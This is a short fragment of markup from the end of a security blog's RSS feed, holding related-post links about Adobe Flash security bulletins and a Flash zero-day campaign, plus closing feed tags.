data-position="8" data-poid="in-6339" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/12/apsb13-09-adobe-flash-march-2013-security-bulletin-review/" class="wp_rp_title">APSB13-09 &#8211; Adobe Flash March 2013 Security Bulletin Review</a></li><li data-position="9" data-poid="in-6145" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/10/boeing-job-com-campaign-and-adobe-flash-0days-additional-informations/" class="wp_rp_title">Boeing-job.com Campaign and Adobe Flash 0days Additional Informations</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/04/09/apsb13-11-adobe-flash-april-2013-security-bulletin-review/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
